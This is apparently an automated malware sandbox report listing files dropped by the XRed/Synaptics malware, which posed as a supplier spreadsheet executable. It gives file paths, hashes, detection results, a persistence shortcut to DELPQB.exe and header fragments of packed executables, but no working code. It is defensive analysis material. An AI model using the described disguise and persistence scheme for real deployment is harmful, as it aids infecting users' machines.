                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PiAP-5OZ2PLYR7AXi-Ncsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266297674491208
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                MD5:FE45FFAFFDB9CAC5263C6B0EB5D06D76
                                                                                                                SHA1:3F542DCCADA538DE3AE37EC5E36F22390246D384
                                                                                                                SHA-256:54277E8CD3426B4FB5480FEBC4ACF02111C2811D988B6201E0BC2AA995A56F10
                                                                                                                SHA-512:5536E6DBD43D5BCA8FF847B12C0577046A76AA61D9D647C3198BEBE7633A110E17598DFA93D81AC21373C4887B218CB7FDB51ADCBD355CEC9D9581A9F66A77D1
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.251733111854665
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0g8GkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0Gk+pAZewRDK4mW
                                                                                                                MD5:BF8BE002734A6711B19CE6CC5DF5DC97
                                                                                                                SHA1:4B6524DE3454EA81C4D0331E8B288EF00FFE62B5
                                                                                                                SHA-256:AEEC3AC4498EEB928FB9D4EC55372DD574F3A372451FF2F0008E5183B9C4AC22
                                                                                                                SHA-512:F940A96E64DD594B5CFCA2C2381DB43794E5280C2C57C349E4A66979E0EBBE03D0D4F9AF4D1A3BA922C5BE6924CC44391FF8BD8AB40586E63EDAEEADFA69D936
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266000843826172
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0CSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                MD5:89527441C9A92CD2E25B10629172FD34
                                                                                                                SHA1:09ADBD0042A4F220498696FBE4D161A9D5B37BC9
                                                                                                                SHA-256:699DBDEFEA582E5E946EB33A2EF8B92B4BEE22ABB92313D02CFB1CB18C2DAA01
                                                                                                                SHA-512:3A5F5F30E5F1357318AD367D30470AD9A8675B7480F693C0A70078D267220D56F75315057AC65F364A102E3B4026B8DD406AB79B62D1326887EE0C9E9EA652D2
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.257909150101427
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                                                MD5:1B283EABCADD1DB9F8B11F6B0E0FB535
                                                                                                                SHA1:D0D8EA201BED25D241FF2FD4C3E559E1A30CA32C
                                                                                                                SHA-256:D426611C9B13752957E5390917307F628834A4F73B1CE7EDB736471855D383EC
                                                                                                                SHA-512:F91F2A569ED9B00DF2E755E062E734E505A161BF994D927A79B9D8E21F2A615BF6DEB475FBC8706EB96F4F50CF9434E235F69F88DEDCF4296658C8AF189DB7E0
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256900545120508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0xQZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                MD5:77D70C3F5CBCE59D5737C0DC7F2B7968
                                                                                                                SHA1:837EF8208CC2C77D075DAB20C1B1480FC2697138
                                                                                                                SHA-256:348D3F3525B18B79004E7BE2A03A33C53130975D59D59308BCEA6D6A06AFE751
                                                                                                                SHA-512:FE29DBE7994BC05B3E5E29C5F7699D5522CE7B47C76FB84AE7274A18520D01F12C0C53B77EECD52F1E1EF1871612475F0789DE1668A115ACC36D81723122E504
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.27342032091974
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QADSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Xg+pAZewRDK4mW
                                                                                                                MD5:6A48446D012EA51F3451D91CA6EF8178
                                                                                                                SHA1:700A13884298004CA2165F671B3EDA861794D03A
                                                                                                                SHA-256:008D07F616FF989C3F4F4DD902F9A81DBF9D38C2B9F6F761C86AA3878416B5E0
                                                                                                                SHA-512:F5FBF97238643F7E17CEDBBD895E56B3D1C133DBC1B368DE02D0642FEEB4927830080D10DBD640A3153C6ACF794C199951B5FE0B33C64845E3DB425C4B258F2D
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.248738044135582
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+vD+pAZewRDK4mW
                                                                                                                MD5:4811BE6E3CFB84240492E6E433C5D902
                                                                                                                SHA1:B9CDF1A69D28F5C3E67056EE6F0D6E4EEAA94A6A
                                                                                                                SHA-256:B5A430F29C9496415B201A8D428EB9F3E20854C24FEF20704C09F2F506D86FF6
                                                                                                                SHA-512:5370FF6E7DDD4C1308C87FE7C0BD903149FD1B81288B703402F8050BCC28B17D8BFBC2BB4931F60FDD498F1912C99B6DE34FAE516ADE5A2A939E7394E0A7F3CC
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.262797527534029
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                MD5:0491823B2411D285AEBA6BD4B8A3A03B
                                                                                                                SHA1:D14E3DA406F50178DC251F808E3064CDC40071B9
                                                                                                                SHA-256:AB065287D6023EFBCDED94AC1E35F73525A320610A6C1A5313D2BB73DF296D3F
                                                                                                                SHA-512:FA1B4915216AB904BCCF48FEFABEA6F6BF25DEC5F76D70157F421F1C000446989E24A015AEAA66DBCBF4A6495619A1501EF74C2220CCB138C2C49EA400304715
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.259878354648374
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+09LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gL+pAZewRDK4mW
                                                                                                                MD5:8B7AF61E6004DD6896DA9F8408297FFF
                                                                                                                SHA1:2062A9FA0D8A1009FF2836049E1A5957F42C9818
                                                                                                                SHA-256:42E0C9AF01C519CFBAD716EE1D0C3E2149378FBCECF76376AE569752B95C1EE5
                                                                                                                SHA-512:D3A8581F4FD0982BDEE5784F05B1B8DDA8398686CFF4B57C66136117B88B03FB20806F6B46F4BA6DDFD86630797589A0B0572D38F0AC1AAB95DF5FFEC8DE757A
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.257456620298836
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0kmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:B8290924743E2E841239C03FA0391500
                                                                                                                SHA1:D792D12BDFCEB165C809C96AA67B421340869099
                                                                                                                SHA-256:31CA9AF545F70150E81DCBE2986E111F8633AF762FD07C2C77C95CC6EE902BA4
                                                                                                                SHA-512:C4F2E5C51CE2F573678147D4913DAF3EC38944A7CD437C5498AC4DA858C898CCFC3D8AC5BA19AD90989CDAEC62861EEB3AF757D5D1FB12C533CF8375351DBF4E
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265916698432673
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0tozIeSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D8e+pAZewRDK4mW
                                                                                                                MD5:2E6F50B3D8A878366813EE40C7442998
                                                                                                                SHA1:41A5963B41ABAA22A5503870FF9B08A2250E4E79
                                                                                                                SHA-256:18086E770583B59273BFEBE2364E75232F29F0E69492C0C7ABDFA10C927DC1C9
                                                                                                                SHA-512:B576F9539C34096B92A1FB367F98965236F3F5E41D929930439F915E00AB304E43AECD314291C66AFF2377E3270A2712482FCFF80BD19AF47BC1C3FD36E28790
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.247121463970134
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0k4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                MD5:9D96E105E649BCD4F21C2C8F1F948CBB
                                                                                                                SHA1:F1EA19FB95F84021470CB92F753C4784040473CC
                                                                                                                SHA-256:A3DD2EBF2758C9591F10DBA32830018968AEB57F5913E2E8B6BC9EBD03E3FC19
                                                                                                                SHA-512:D4B00C803FFD33914D32A4465C2144B4B8083B5DE81C3FFEE052FE751F18A06425E8928A9DADDBB9006BB8225EC8B1822C8C03280DC116A418CC54064BB3F62B
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.251571562235036
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0BEXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+wG+pAZewRDK4mW
                                                                                                                MD5:6FD3CA6097C0E14E77D34E9743C39ED5
                                                                                                                SHA1:0EAB06E91697694DD404B851F15F2F557DE361C9
                                                                                                                SHA-256:320FED0158324EA9C0B8DD710327A0A9BDAA31ECC67184A5A5BBE7550641E3D2
                                                                                                                SHA-512:7BA878BB9230108F57E7CEF2891EC29B3ABAA51C2469CC3AAF68EE295EB4DFA455A89ADEC2BFD3A380177C544A48FC4D2C3F8A616CE3C94A1BB5A0E1B896937A
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256888177146626
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0/zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:B18BDCD561F8DE8A1A5C3996C3C24AE1
                                                                                                                SHA1:D7AF6EEA96A5251A54C613D5956A35B7AEC92226
                                                                                                                SHA-256:DEAC793CF72CBEB150597736ACA025940EA35D97BD5F26099E588CB02D222A98
                                                                                                                SHA-512:9656150D31FE918907E2FF457DF8B10C37551438BD18F2FAF204D62CB60AB5CE0B97CCC8A9CFEBC6FAAA61C1904FDF5C6689A7AB5E7FA0540D82B7E5AF4B2E59
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.252597775649406
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+009nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                MD5:BEDE156BC655A620612A40073190678A
                                                                                                                SHA1:17E317AB2587EB700B21F72C6DE4FC605F2163F3
                                                                                                                SHA-256:D2EA59060FA2FC35D88294A6D8F6977A435E8293592D3B8E9F0228AD297356C6
                                                                                                                SHA-512:3DFFDAEC96ABDA2332DC709F866E89003CC4C3B6EFE01FCEEB1CFB5DA7FF1FA72306DDE44CA774E9575CFB66B02FB5B1D547B624E8AAC6E360EC36E006F910FC
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.253843257075183
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0+uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                MD5:66C2E91EF87CEF2720335C191EC26BE7
                                                                                                                SHA1:9B1C7A417C4057341F49E8A1F596F860E034D6F2
                                                                                                                SHA-256:AE229579AF779B299652E21FE942CCD0B9D4EE3D1A520E5E45BE6CDBFACA3E73
                                                                                                                SHA-512:1C120E33B6776A87E834DB5491E0EC7893E3244C48AEEF6C098D0FB6AAA6D12D29AA4086AAC27B792127FE115486060CF3A13262338F66717A221A5D5939C697
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265677308802923
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                MD5:ED1C750A8AB5B1C12C9A206D9331432A
                                                                                                                SHA1:52064C71B691927310499B1FEAD761E7F94190E3
                                                                                                                SHA-256:7634B4D6AF348B3A4C3CE0236734309EF220933DED3D1D004E965B96DE7E09FE
                                                                                                                SHA-512:4A0E33114764EBEB5ED05026ACF5729315760A2761801AC33C00254CE471C9AEDDB93D4EE2897245EDD00893A7BC97453CA395C853F74CC583AED87B62F6B3AD
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.261936101032919
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0kcFISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YFI+pAZewRDK4mW
                                                                                                                MD5:A7E91F70E392859FE49A1EA95E9016BB
                                                                                                                SHA1:50CC402C4DD12D7A98A99B9D2895F8687D4C0024
                                                                                                                SHA-256:6101CD59C8AB34B42A12B8CE220865A6DDC4A1A0347C6E29C8C1D949E3E1AD58
                                                                                                                SHA-512:F075E60D9CCBB80AAE2DA53B4508B36906B4FAA4BD5E71DA1C76BDE46147CA17F298EDBC4FAAF6EE996CCA005F98408F743B54A6DB78C68484F182DCFB7F63F1
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18387
                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):165
                                                                                                                Entropy (8bit):1.7769794087092887
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                Malicious:false
                                                                                                                Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):3.746897789531007
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 08:58:02 2024, mtime=Mon Dec 30 08:58:02 2024, atime=Mon Dec 30 08:58:02 2024, length=913920, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1817
                                                                                                                Entropy (8bit):3.447322035134466
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:8g8IKqj5k2I94+UmeUQriJ7AR4oE2+s9T4IlIpbJPJtm:8JId62Iy+x8riJs6Cr9MIlUJPJt
                                                                                                                MD5:AA8F1A12D83A7397159B005736FA8458
                                                                                                                SHA1:3D1B83D32F210AAB3FE198CCD90CC5E00576B2B8
                                                                                                                SHA-256:50A213908AA41650A2C293C2CDEF0F6BF3F4284C0EA2FD00E2358F7F3F37F86F
                                                                                                                SHA-512:C5966AC4401388739BBEF78DB2B63A1BAAC2A00E58C27FB45136FB1B6320CE32DBB5E1DE30948DD3F81D109E1B45FB60959F2F7F113A1A477B0EF048A7FF1740
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ....vVP.Z.....P.Z.....P.Z............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....9K.Z...5.P.Z......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y=O..........................3*N.A.p.p.D.a.t.a...B.V.1......Y;O..Roaming.@......EW.=.Y;O............................8.R.o.a.m.i.n.g.....V.1......YAO..Windata.@......YAO.YAO.... .......................0.W.i.n.d.a.t.a.....`.2......YBO .DELPQB.exe..F......YBO.YBO....8.....................q...D.E.L.P.Q.B...e.x.e.......d...............-.......c..................C:\Users\user\AppData\Roaming\Windata\DELPQB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.D.E.L.P.Q.B...e.x.e.-.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Category:dropped
                                                                                                                Size (bytes):913920
                                                                                                                Entropy (8bit):7.851983325561796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:2hloDX0XOf4Z79H8qN3k87zwVb2UDEus:2hloJf68qIyUDEu
                                                                                                                MD5:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                SHA1:648217F05DB22B2663A5D3284D2C699DA96423F4
                                                                                                                SHA-256:2180493DD5655C4CCF4CC17D0E3B1F69B9005DDC4152EB85EF7A8DA026A75573
                                                                                                                SHA-512:9010C19B2C792F90F8EDB1233C843B1D999AE84E1B2D49935E4790A8BD3B22446866B62A3F2C679DC89CAF33F0D5F620EB97D72DC5882388089BD709BE35EBDC
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...EBrg.........."......P........... .......0....@.......................................@...@.......@.........................$....0......................@........................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Category:dropped
                                                                                                                Size (bytes):913920
                                                                                                                Entropy (8bit):7.851983325561796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:2hloDX0XOf4Z79H8qN3k87zwVb2UDEus:2hloJf68qIyUDEu
                                                                                                                MD5:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                SHA1:648217F05DB22B2663A5D3284D2C699DA96423F4
                                                                                                                SHA-256:2180493DD5655C4CCF4CC17D0E3B1F69B9005DDC4152EB85EF7A8DA026A75573
                                                                                                                SHA-512:9010C19B2C792F90F8EDB1233C843B1D999AE84E1B2D49935E4790A8BD3B22446866B62A3F2C679DC89CAF33F0D5F620EB97D72DC5882388089BD709BE35EBDC
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...EBrg.........."......P........... .......0....@.......................................@...@.......@.........................$....0......................@........................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18387
                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):165
                                                                                                                Entropy (8bit):1.7769794087092887
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                Malicious:false
                                                                                                                Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):771584
                                                                                                                Entropy (8bit):6.629891194746731
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 100%
